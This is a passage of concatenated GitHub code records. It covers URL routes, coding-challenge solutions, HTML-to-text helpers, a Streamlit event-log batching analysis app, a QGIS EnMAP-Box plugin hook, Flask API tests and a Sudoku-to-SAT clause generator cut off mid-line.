.as_view(), name='scoreboard' ),\n url(r'^team/(?P[-\\w]+)$' , team_views.TeamView .as_view(), name='team' ),\n]\n\n","repo_name":"attackgithub/Asteria","sub_path":"asteria/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5584729029","text":"mySolution = []\nwith open('resultCatsAndAMouse.txt') as f:\n line = f.readline()\n while line:\n line = line.strip()\n mySolution.append(line)\n line = f.readline()\n#print(mySolution)\n\ngoodSolution = []\nwith open('goodSolutionCats.txt') as g:\n line = g.readline()\n while line:\n line = line.strip()\n goodSolution.append(line)\n line = g.readline()\n#print(goodSolution)\n\nfail = []\nfor i in range(0,100):\n if goodSolution[i] != mySolution[i]:\n fail.append(i)\n fail.append(goodSolution[i])\n fail.append(mySolution[i])\nprint(fail)\n\n\n","repo_name":"zseen/hackerrank-challenges","sub_path":"Python/Implementation/CatsAndAMouse/DebugCatsAndAMouse.py","file_name":"DebugCatsAndAMouse.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285391798","text":"#\n# @lc app=leetcode id=423 lang=python3\n#\n# [423] Reconstruct Original Digits from English\n#\n# https://leetcode.com/problems/reconstruct-original-digits-from-english/description/\n#\n# algorithms\n# Medium (45.68%)\n# Likes: 122\n# Dislikes: 434\n# Total Accepted: 19.4K\n# Total Submissions: 42.5K\n# Testcase Example: '\"owoztneoer\"'\n#\n# Given a non-empty string containing an out-of-order English representation of\n# digits 0-9, output the digits in ascending order.\n# \n# Note:\n# \n# Input 
contains only lowercase English letters.\n# Input is guaranteed to be valid and can be transformed to its original\n# digits. That means invalid inputs such as \"abc\" or \"zerone\" are not\n# permitted.\n# Input length is less than 50,000.\n# \n# \n# \n# Example 1:\n# \n# Input: \"owoztneoer\"\n# \n# Output: \"012\"\n# \n# \n# \n# Example 2:\n# \n# Input: \"fviefuro\"\n# \n# Output: \"45\"\n# \n# \n#\nfrom collections import Counter\n\nclass Solution:\n def originalDigits(self, s: str) -> str:\n l, cnt, ret = [('zero','z'),('one','o'),('two','w'),('three','h'),('four','u'),('five','f'),('six','x'),('seven','s'),('eight','g'),('nine','i')], Counter(s), []\n for i in [0, 2, 4 , 6, 8, 1, 3, 5, 7, 9]:\n n = cnt[l[i][1]]\n for c in l[i][0]:\n cnt[c] -= n\n ret += [str(i)]*n\n\n return \"\".join(sorted(ret))\n\n \n\n","repo_name":"chenxu0602/LeetCode","sub_path":"423.reconstruct-original-digits-from-english.py","file_name":"423.reconstruct-original-digits-from-english.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38874033168","text":"import re\nfrom html.entities import entitydefs\n\n\nclass StripHtmlTags(object):\n\n def process(self, html):\n \"\"\"\n Remove HTML tags from a string and replace numeric and\n named entities with the corresponding character, so the\n HTML text can be displayed in a simple text view.\n \"\"\"\n if html is None:\n return None\n\n # If we would want more speed, we could make these global\n re_strip_tags = re.compile('<[^>]*>')\n re_unicode_entities = re.compile('&#(\\d{2,4});')\n re_html_entities = re.compile('&(.{2,8});')\n re_newline_tags = re.compile('(]*>|<[/]?ul[^>]*>|)', re.I)\n re_listing_tags = re.compile(']*>', re.I)\n\n result = html\n\n # Convert common HTML elements to their text equivalent\n result = re_newline_tags.sub('\\n', result)\n result = re_listing_tags.sub('\\n * ', result)\n result = re.sub('<[Pp]>', '\\n\\n', result)\n\n # Remove all HTML/XML tags from the string\n result = re_strip_tags.sub('', result)\n # Convert numeric XML entities to their unicode character\n result = re_unicode_entities.sub(\n lambda x: chr(int(x.group(1))),\n result)\n\n # Convert named HTML entities to their unicode character\n result = re_html_entities.sub(\n lambda x: str(entitydefs.get(x.group(1), ''), 'iso-8859-1'),\n result)\n\n # Convert more than two newlines to two newlines\n result = re.sub('([\\r\\n]{2})([\\r\\n])+', '\\\\1', result)\n\n return result.strip()\n\n\nclass ConvertMarkdown(object):\n\n def process(self, html_str):\n import html2text\n\n try:\n text = html2text.html2text(html_str)\n return text.strip()\n\n except Exception:\n return ''\n","repo_name":"gpodder/mygpo-feedservice","sub_path":"feedservice/parse/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"35800786354","text":"import streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pm4py\r\nimport altair as alt\r\nimport os\r\nimport plotly.express as px\r\n\r\n#Removing a warning that will come due to deprication\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n#Set the title for the sidebar\r\nst.sidebar.subheader('Features for batch detection')\r\n\r\n#Set the title 
for the app\r\nst.title(\"Batching\")\r\n\r\n#Import a file\r\ndef file_selector(folder_path='.'):\r\n filenames = os.listdir(folder_path)\r\n selected_filename = st.sidebar.selectbox('Select a file', filenames)\r\n return os.path.join(folder_path, selected_filename)\r\nfilename = file_selector()\r\nst.write('You selected `%s`' % filename)\r\n\r\n\r\n#Read in the data\r\n#data = pd.read_csv('event_log.csv', sep=\";\")\r\ndata = pd.read_csv(filename, sep=\";\")\r\n\r\n#Set some text to introduce the original event log\r\nst.subheader(\"This is the original event log\")\r\n\r\n#Show the original event log\r\nst.dataframe(data)\r\n\r\n#######\r\n# Time level batch detection - features selection\r\n#######\r\n\r\n# Select resources\r\nresource = data['resource'].unique()\r\nresource_selected = st.sidebar.multiselect('1. Select resources', resource)\r\nmask_resource = data['resource'].isin(resource_selected)\r\ndata = data[mask_resource]\r\n\r\n# Select activities\r\nactivity = data['activity'].unique()\r\nactivity_selected = st.sidebar.multiselect('2. Select activities', activity)\r\nmask_activity = data['activity'].isin(activity_selected)\r\ndata = data[mask_activity]\r\n\r\n#Drop the columns selected from the multiselect\r\n#Select multiple columns\r\ncols_drop = st.multiselect(\"Select columns to drop\", data.columns)\r\n#Drop columns\r\ndata = data.drop(cols_drop, axis=1)\r\n\r\n#Show the new dataframe\r\n#Text to introduce the new dataframe\r\nst.text(\"Once features have been selected, the event log looks like this\")\r\n#Show the new dataframe\r\nst.dataframe(data)\r\n\r\n#Change the time between activites that should form a batch\r\nm=st.sidebar.slider(\"3. Time in minutes between activites that should form a batch\",1,60)\r\n\r\n#######\r\n# Time level batch detection - features selection end\r\n#######\r\n\r\n#######\r\n# Time level batch detection\r\n#######\r\n\r\n# Sort events by time start and time end\r\ndata[\"start time\"] = pd.to_datetime(data[\"start time\"], format=\"%Y-%m-%d %H:%M:%S\")\r\ndata[\"end time\"] = pd.to_datetime(data[\"end time\"], format=\"%Y-%m-%d %H:%M:%S\")\r\ndata = data.sort_values(['start time','end time'])\r\n\r\nevents = data[[\"start time\", \"end time\"]].to_dict(\"r\")\r\nfor e in events:\r\n e[\"start time\"] = e[\"start time\"].timestamp()\r\n e[\"end time\"] = e[\"end time\"].timestamp()\r\nintervals = [(e[\"start time\"], e[\"end time\"], set([(e[\"start time\"], e[\"end time\"])])) for e in events]\r\nintervals.sort()\r\n\r\n\r\n# Merge overlaping intervals\r\ncontinue_cycle = True\r\nwhile continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals)-1:\r\n if intervals[i][1] > intervals[i+1][0]:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i+1][0]), max(intervals[i][1], intervals[i+1][1]), intervals[i][2].union(intervals[i+1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i+1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n\r\n# Here we merge intrval with time in minutes defind before\r\ncontinue_cycle = True\r\nwhile continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals)-1:\r\n if intervals[i+1][0] - intervals[i][1] <= m*60:\r\n # decide to merge interval i and i+1\r\n 
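# (a merged interval keeps the earliest start, the latest end and the union of\r\n            # its member events, so len(interval[2]) later gives the batch size)\r\n            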
new_interval = (min(intervals[i][0], intervals[i+1][0]), max(intervals[i][1], intervals[i+1][1]), intervals[i][2].union(intervals[i+1][2]))\r\n            # add the new interval to the list\r\n            intervals.append(new_interval)\r\n            # remove the i+1 interval\r\n            del intervals[i+1]\r\n            # remove the i interval\r\n            del intervals[i]\r\n            # sort the intervals\r\n            intervals.sort()\r\n            # set the variable continue_cycle to True\r\n            continue_cycle = True\r\n            # interrupt the current iteration on the intervals\r\n            break\r\n        i = i + 1\r\n\r\n# Here is batching\r\nfrom pandas import DataFrame\r\nbatch = [len(interval[2]) for interval in intervals]\r\ndf_batches = DataFrame(batch, columns=['Number of events'])\r\n\r\n# Types of batching\r\n\r\ndef check_batch_type(batch):\r\n    events_batch = sorted(list(batch[2]))\r\n    # take the minimum of the left-extreme of each interval\r\n    min_left_events = min(ev[0] for ev in events_batch)\r\n    # take the maximum of the left-extreme of each interval\r\n    max_left_events = max(ev[0] for ev in events_batch)\r\n    # take the minimum of the right-extreme of each interval\r\n    min_right_events = min(ev[1] for ev in events_batch)\r\n    # take the maximum of the right-extreme of each interval\r\n    max_right_events = max(ev[1] for ev in events_batch)\r\n    \r\n    # CONDITION 1 - All the events in the batch have identical start and end timestamps\r\n    if min_left_events == max_left_events and min_right_events == max_right_events:\r\n        return \"Simultaneous\"\r\n    # CONDITION 4 - All the events in the batch have identical start timestamp:\r\n    if min_left_events == max_left_events:\r\n        return \"Batching on Start\"\r\n    # CONDITION 5 - All the events in the batch have identical end timestamp:\r\n    if min_right_events == max_right_events:\r\n        return \"Batching on End\"\r\n    \r\n    # now we could be in the SEQUENTIAL batching or the CONCURRENT batching\r\n    # in order to be in the SEQUENTIAL, we need that for all the consecutive events the end of the first is equal to the start of the second\r\n    is_sequential = True\r\n    i = 0\r\n    while i < len(events_batch)-1:\r\n        # if there are two consecutive events that are not sequentially matched, then we automatically fall inside the CONCURRENT batching\r\n        if events_batch[i][1] != events_batch[i+1][0]:\r\n            is_sequential = False\r\n            break\r\n        i = i + 1\r\n    if is_sequential:\r\n        return \"Sequential batching\"\r\n    else:\r\n        return \"Concurrent batching\"\r\n\r\n# collect (batch_type, size) for every detected batch\r\ndf_types = pd.DataFrame(columns=['batch_type', 'len'])\r\n\r\n# check the type for each batch (interval of length at least equal to two)\r\nfor interv in intervals:\r\n    if len(interv[2]) >= 2:\r\n        batch_type = check_batch_type(interv)\r\n        #print(batch_type)\r\n        df_types = df_types.append({'batch_type': batch_type, 'len': len(interv[2])}, ignore_index=True)\r\n\r\n\r\n\r\n\r\n# STATISTICS\r\n\r\n# total number of batches with two and more events\r\ndf_batches_new = df_batches[df_batches['Number of events']!=1]\r\n\r\n\r\n\r\ndf_end = df_types.loc[df_types['batch_type'] == 'Batching on End']\r\ndf_seq = df_types.loc[df_types['batch_type'] == 'Sequential batching']\r\ndf_con = df_types.loc[df_types['batch_type'] == 'Concurrent batching']\r\ndf_start = df_types.loc[df_types['batch_type'] == 'Batching on Start']\r\ndf_sim = df_types.loc[df_types['batch_type'] == 'Simultaneous']\r\n\r\n\r\nst.subheader('Total number of batches')\r\ncount_column = df_types['batch_type'].count()\r\ncount_column\r\n\r\nst.text('Batching types')\r\n\r\n# total number of batches per each batching type and in total\r\nsum_end_batch = 
df_end['batch_type'].count()\r\nsum_start_batch = df_start['batch_type'].count()\r\nsum_seq_batch = df_seq['batch_type'].count()\r\nsum_sim_batch = df_sim['batch_type'].count()\r\nsum_con_batch = df_con['batch_type'].count()\r\n\r\n# Table\r\nbatching_types = {'concurrent': [sum_con_batch], 'sequential': [sum_seq_batch], 'simultaneous': [sum_sim_batch], 'on start': [sum_start_batch], 'on end': [sum_end_batch]}\r\ndf_batching_event = pd.DataFrame(data=batching_types)\r\ndf_batching_event\r\n\r\n\r\n# total number of batched events per each batching type and in total\r\nsum_end = df_end['len'].sum()\r\nsum_start = df_start['len'].sum()\r\nsum_seq = df_seq['len'].sum()\r\nsum_con = df_con['len'].sum()\r\nsum_sim = df_sim['len'].sum()\r\nsum_all_batches = sum_end + sum_start + sum_seq + sum_con + sum_sim\r\n\r\nst.subheader('Total number of batched events, all types')\r\nsum_all_batches\r\n\r\nst.text('Batched events per types')\r\n# Table\r\nbatching_events_types = {'concurrent': [sum_con], 'sequential': [sum_seq], 'simultaneous': [sum_sim], 'on start': [sum_start], 'on end': [sum_end]}\r\ndf_batching_event_types = pd.DataFrame(data=batching_events_types)\r\ndf_batching_event_types\r\n\r\n# total number of batched events, all batching types\r\n#st.text('Total number of batched events, all batching types')\r\n#sum_all_event = df_types['len'].sum()\r\n#sum_all_event\r\n\r\nst.text('Batches and batched events')\r\ndf_batches_new\r\n\r\n\r\n# Statistics\r\n\r\n\r\n#######\r\n# Time level batch detection end\r\n#######\r\n\r\n\r\n#######\r\n# Case level batch detection\r\n#######\r\n\r\ndef load_dataframe():\r\n df = pm4py.read_csv(\"event_log.csv\", sep=\";\")\r\n df = pm4py.objects.log.util.dataframe_utils.convert_timestamp_columns_in_df(df)\r\n df = df.sort_values(['start time', 'end time'])\r\n df[\"event id\"] = df.index.astype(str)\r\n df = df.reset_index()\r\n return df\r\n\r\n\r\ndef get_groups_from_dataframe(df):\r\n return df.groupby([\"activity\", \"resource\"]).size().to_dict()\r\n\r\n\r\ndef merge_overlapping_intervals(intervals):\r\n continue_cycle = True\r\n while continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals) - 1:\r\n if intervals[i][1] > intervals[i + 1][0]:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i + 1][0]), max(intervals[i][1], intervals[i + 1][1]),\r\n intervals[i][2].union(intervals[i + 1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i + 1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n return intervals\r\n\r\n\r\ndef merge_near_intervals(intervals, max_allowed_distance):\r\n continue_cycle = True\r\n while continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals) - 1:\r\n if intervals[i + 1][0] - intervals[i][1] <= max_allowed_distance:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i + 1][0]), max(intervals[i][1], intervals[i + 1][1]),\r\n intervals[i][2].union(intervals[i + 1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i + 1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to 
True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n return intervals\r\n\r\n\r\ndef check_batch_type(batch):\r\n events_batch = sorted(list(batch[2]))\r\n # take the minimum of the left-extreme of each interval\r\n min_left_events = min(ev[0] for ev in events_batch)\r\n # take the maximum of the left-extreme of each interval\r\n max_left_events = max(ev[0] for ev in events_batch)\r\n # take the minimum of the right-extreme of each interval\r\n min_right_events = min(ev[1] for ev in events_batch)\r\n # take the maximum of the right-extreme of each interval\r\n max_right_events = max(ev[1] for ev in events_batch)\r\n\r\n # CONDITION 1 - All the events in the batch have identical start and end timestamps\r\n if min_left_events == max_left_events and min_right_events == max_right_events:\r\n return \"Simultaneous\"\r\n # CONDITION 4 - All the events in the batch have identical start timestamp:\r\n if min_left_events == max_left_events:\r\n return \"Batching on Start\"\r\n # CONDITION 5 - All the events in the batch have identical end timestamp:\r\n if min_right_events == max_right_events:\r\n return \"Batching on End\"\r\n\r\n # now we could be in the SEQUENTIAL batching or the CONCURRENT batching\r\n # in order to be in the SEQUENTIAL, we need that for all the consecutive events the end of the first is equal to the start of the second\r\n is_sequential = True\r\n i = 0\r\n while i < len(events_batch) - 1:\r\n # if there are two consecutive events that are not sequentially matched, then we automatically fall inside the CONCURRENT batching\r\n if events_batch[i][1] != events_batch[i + 1][0]:\r\n is_sequential = False\r\n break\r\n i = i + 1\r\n if is_sequential:\r\n return \"Sequential batching\"\r\n else:\r\n return \"Concurrent batching\"\r\n\r\n\r\n\r\ndef get_events_from_dataframe(dataframe):\r\n all_events = [(x[\"start time\"].timestamp(), x[\"end time\"].timestamp(), x[\"case\"]) for x in\r\n dataframe[[\"start time\", \"end time\", \"case\"]].to_dict(\"r\")]\r\n all_events.sort()\r\n return all_events\r\n\r\n\r\n\r\ndef find_batches_with_type_and_count_cases(df, case_dict):\r\n events = get_events_from_dataframe(df)\r\n intervals = [(e[0], e[1], {(e[0], e[1], e[2])}) for e in\r\n events]\r\n intervals.sort()\r\n intervals = merge_overlapping_intervals(intervals)\r\n intervals = merge_near_intervals(intervals, 15 * 60)\r\n batches = [x for x in intervals if len(x[2]) > 1]\r\n for batch in batches:\r\n batch_type = check_batch_type(batch)\r\n cases = set(x[2] for x in batch[2])\r\n for case in cases:\r\n case_dict[batch_type][case] = case_dict[batch_type][case] + 1\r\n\r\n\r\ndef measure_service_time(list_events):\r\n # we start measuring the service time\r\n service_time_total = 0.0\r\n\r\n # take the first event (the one in list_events[0]) and consider its start time (list_events[0][0]) and its end time (list_events[0][1])\r\n this_start = list_events[0][0]\r\n this_end = list_events[0][1]\r\n\r\n i = 1\r\n while i < len(list_events):\r\n # for the i-th event, consider its start time (list_events[i][0]) and end time (list_events[i][1])\r\n curr_start = list_events[i][0]\r\n curr_end = list_events[i][1]\r\n\r\n # if the current event start is greater than the previously recorded end, its time to add the difference between this_end and this_start to the service time\r\n if curr_start > this_end:\r\n service_time_total = service_time_total + this_end - this_start\r\n this_start = curr_start\r\n this_end = curr_end\r\n else:\r\n 
# otherwise, the events are overlapping, so update the completion time by the new end timestamp (take the maximum between the old recorded one and the new)\r\n            this_end = max(this_end, curr_end)\r\n        i = i + 1\r\n\r\n    # at the end of the iteration, add the current values of this_start and this_end that still are not recorded in the service time\r\n    service_time_total = service_time_total + this_end - this_start\r\n\r\n    return service_time_total\r\n\r\n\r\ndataframe = load_dataframe()\r\nall_events = get_events_from_dataframe(dataframe)\r\ncases = set(dataframe[\"case\"].unique())\r\nactivities_resources = get_groups_from_dataframe(dataframe)\r\ncase_dict = {\"Simultaneous\": {}, \"Batching on Start\": {}, \"Batching on End\": {}, \"Sequential batching\": {},\r\n             \"Concurrent batching\": {}, \"Lead Time\": {}, \"Service Time\": {}, \"Flow Time\": {}, \"Flow Rate\": {}}\r\n\r\n\r\nfor case in cases:\r\n    case_events = [x for x in all_events if x[2] == case]\r\n    lead_time = max(x[1] for x in case_events) - min(x[0] for x in case_events)\r\n    service_time = measure_service_time(case_events)\r\n    case_dict[\"Simultaneous\"][case] = 0\r\n    case_dict[\"Batching on Start\"][case] = 0\r\n    case_dict[\"Batching on End\"][case] = 0\r\n    case_dict[\"Sequential batching\"][case] = 0\r\n    case_dict[\"Concurrent batching\"][case] = 0\r\n    case_dict[\"Lead Time\"][case] = lead_time\r\n    case_dict[\"Service Time\"][case] = service_time\r\n    case_dict[\"Flow Time\"][case] = lead_time - service_time\r\n    case_dict[\"Flow Rate\"][case] = float(service_time) / float(lead_time) if lead_time > 0 else 0.0\r\n\r\n\r\nfor act_res in activities_resources:\r\n    filtered_dataframe = dataframe[dataframe[\"activity\"] == act_res[0]]\r\n    filtered_dataframe = filtered_dataframe[filtered_dataframe[\"resource\"] == act_res[1]]\r\n    find_batches_with_type_and_count_cases(filtered_dataframe, case_dict)\r\n\r\ncase_dataframe = pd.DataFrame(case_dict)\r\ncase_dataframe[\"case\"] = case_dataframe.index.astype(str)\r\ncase_dataframe = case_dataframe.reset_index()\r\n\r\n#Set some text to show the original dataframe\r\nst.subheader(\"Case level batching\")\r\n\r\n#Show the final dataframe\r\nst.dataframe(case_dataframe)\r\n\r\n######\r\n#Case level batch detection end\r\n\r\n\r\n# Case level batching statistics\r\nst.text(\"Case level batching statistics\")\r\ndf = pd.DataFrame(case_dataframe,columns=['Simultaneous','Batching on Start','Batching on End','Sequential batching', 'Concurrent batching'])\r\nsum_column = df.sum()\r\nst.dataframe(sum_column)\r\n\r\n\r\n#Plotting the data\r\nst.subheader(\"Explore the case level batching statistics\")\r\n\r\nxvar = st.selectbox('Select x-axis:', case_dataframe.columns[:-1])\r\nyvar = st.selectbox('Select y-axis:', case_dataframe.columns[:-1])\r\nst.write(px.scatter(case_dataframe, x=xvar, y=yvar))","repo_name":"cyangreen/Batching","sub_path":"batching.py","file_name":"batching.py","file_ext":"py","file_size_in_byte":18075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37877560416","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n***************************************************************************\r\n    exampleapp/enmapboxintegration.py\r\n\r\n    This module defines the interactions between an application and\r\n    the EnMAPBox.\r\n    ---------------------\r\n    Date                 : July 2017\r\n    Copyright            : (C) 2017 by Benjamin Jakimow\r\n    Email                : 
benjamin.jakimow@geo.hu-berlin.de\r\n***************************************************************************\r\n* *\r\n* This program is free software; you can redistribute it and/or modify *\r\n* it under the terms of the GNU General Public License as published by *\r\n* the Free Software Foundation; either version 2 of the License, or *\r\n* (at your option) any later version. *\r\n* *\r\n***************************************************************************\r\n\r\nChangelog\r\nEnGeoMAP Version 3.2\r\nDate: February 2023\r\nAuthor: Helge L. C. Daempfling\r\nEmail: hdaemp@gfz-potsdam.de\r\n\r\nSee algorithms.py and engeomap_aux_funcul.py\r\n\r\n\"\"\"\r\n\r\nimport os\r\nfrom qgis.PyQt.QtGui import QIcon\r\nfrom enmapbox.gui.applications import EnMAPBoxApplication\r\nfrom engeomap import APP_DIR\r\n\r\n\r\nclass EnGeoMAP(EnMAPBoxApplication):\r\n\r\n def __init__(self, enmapBox, parent=None):\r\n super(EnGeoMAP, self).__init__(enmapBox, parent=parent)\r\n self.name = 'My EnMAPBox App'\r\n self.version = 'Version 0.8.15'\r\n self.licence = 'BSD-3'\r\n\r\n def icon(self):\r\n pathIcon = os.path.join(APP_DIR, 'icon.png')\r\n return QIcon(pathIcon)\r\n\r\n def menu(self, appMenu):\r\n appMenu = self.enmapbox.menu('Applications')\r\n menu = self.utilsAddMenuInAlphanumericOrder(appMenu, 'Mineral Applications')\r\n menu.setIcon(self.icon())\r\n # add a QAction that starts your GUI\r\n a = menu.addAction('EnGeoMAP 3.2')\r\n a.triggered.connect(self.startGUI)\r\n return menu\r\n\r\n def startGUI(self, *args):\r\n from engeomap.userinterfaces import EnGeoMAPGUI\r\n ui = EnGeoMAPGUI(self.enmapbox.ui)\r\n ui.show()\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapbox/apps/engeomap/enmapboxintegration.py","file_name":"enmapboxintegration.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"70519481445","text":"from flask.testing import FlaskClient\nfrom tests.api.routes.test_project import projects_root\nfrom tests.api.routes.test_model import models_root\n\ndebug_root = \"/api/v1/debug\"\n\n\ndef test_reset_db(client: FlaskClient) -> None:\n \"\"\"\n Test response of GET /debug/reset\n :param client: flask client fixture\n \"\"\"\n\n response = client.get(debug_root + \"/reset\")\n assert response.status_code == 204\n\n\ndef test_impact(client: FlaskClient) -> None:\n \"\"\"\n Test that after GET /debug/reset the impact can be computed\n :param client: flask client fixture\n \"\"\"\n client.get(debug_root + \"/reset\")\n models = client.get(projects_root)\n model_id = models.json[0][\"models\"][0][\"id\"] # retrieve the id of the first model\n\n response = client.get(models_root + \"/\" + str(model_id) + \"/impact\")\n assert response.status_code == 200\n","repo_name":"Orange-OpenSource/SoftwareLifecycleEnvImpact","sub_path":"back/tests/api/routes/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"28076045079","text":"# from flask import Flask\n#\n# app = Flask(__name__)\n#\n#\n# @app.route('/')\n# def hello_world():\n# return 'Hello World!'\n#\n#\n# if __name__ == '__main__':\n# app.run()\n\nfrom configobj import ConfigObj\nimport os\nimport socket, subprocess, sys\n\nSERVICE_DIR = ''\nTEST_DIR = './tests'\n\n\ndef runtests():\n tests = os.listdir(TEST_DIR)\n print(tests)\n os.chdir(TEST_DIR)\n for file in tests:\n if 
(file.endswith('.yaml')):\n os.system('py.test ' + file)\n\n\nif __name__ == '__main__':\n #python app.py test\n if sys.argv[1] == \"test\":\n runtests()\n else:\n print(\"Invalid arguments! Arguments accepted [test]\")","repo_name":"tpham523/CPSC_449_Project_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23214467172","text":"#\r\n# Usage: python3 sud2sat.py [-extended]\r\n#\r\n\r\nimport sys\r\nimport os\r\n\r\nFILE = 0\r\nn = 0\r\ngsat = 0\r\n\r\n#Parse and format input file to an array\r\ndef parsePuzzle(input_file):\r\n try:\r\n open_file = open(input_file)\r\n except:\r\n print(\"Can't open \" + input_file)\r\n sys.exit(-1)\r\n\r\n puzzle_string = \"\"\r\n for line in open_file.readlines():\r\n puzzle_string += ''.join(line.split())\r\n\r\n puzzle_string = puzzle_string.replace('.', '0').replace('*', '0').replace('?', '0')\r\n return puzzle_string\r\n\r\n#Converts base 9 ijk to base 10 + 1\r\ndef base9To10(i,j,k):\r\n return 81*i + 9*j + k + 1\r\n\r\n#Clauses for the preset cells set by the input file\r\ndef genInitialVars(puzzle):\r\n global n, gsat\r\n string = \"\"\r\n for i in range(9):\r\n for j in range(9):\r\n c = puzzle[i*9+j]\r\n if c != '0':\r\n if gsat:\r\n string += \"( \" + str(base9To10(i,j,int(c)-1)) + \" )\\n\"\r\n else:\r\n string += str(base9To10(i,j,int(c)-1)) + ' 0\\n'\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring each cell has a number\r\ndef genCellVars():\r\n global n\r\n string = \"\"\r\n for i in range(9):\r\n for j in range(9):\r\n if gsat:\r\n string += \"( \"\r\n for k in range(9):\r\n string += str(base9To10(i,j,k)) + ' '\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring uniqueness through rows\r\ndef genRowVars():\r\n global n, gsat\r\n string = \"\"\r\n for j in range(9):\r\n for k in range(9):\r\n for i in range(8):\r\n for l in range(i+1,9):\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(j,l,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(j,l,k)) + \" 0\\n\"\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring uniqueness through columns\r\ndef genColVars():\r\n global n, gsat\r\n string = \"\"\r\n for i in range(9):\r\n for k in range(9):\r\n for j in range(8):\r\n for l in range(j+1,9):\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(l,i,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(l,i,k)) + \" 0\\n\"\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring uniqueness through 3x3 sub-grids\r\ndef genSubGridVars():\r\n global n, gsat\r\n string = \"\"\r\n for k in range(9): #number\r\n for a in range(3): #grid - x\r\n for b in range(3): #grid - y\r\n for u in range(3): #cell - x\r\n for v in range(3): #cell - y\r\n for w in range(v +1,3): #check cell - x\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+u,3*b+w,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+u,3*b+w,k)) + \" 0\\n\"\r\n n += 1\r\n\r\n\r\n\r\n for k in range(9): #number\r\n for a in range(3): #grid - x\r\n for b in range(3): #grid - y\r\n for u in range(2): #cell - x\r\n for v in range(3): #cell - y\r\n for w in range(u+1,3): #check cell - x\r\n for t in range(3): #check cell - y\r\n if 
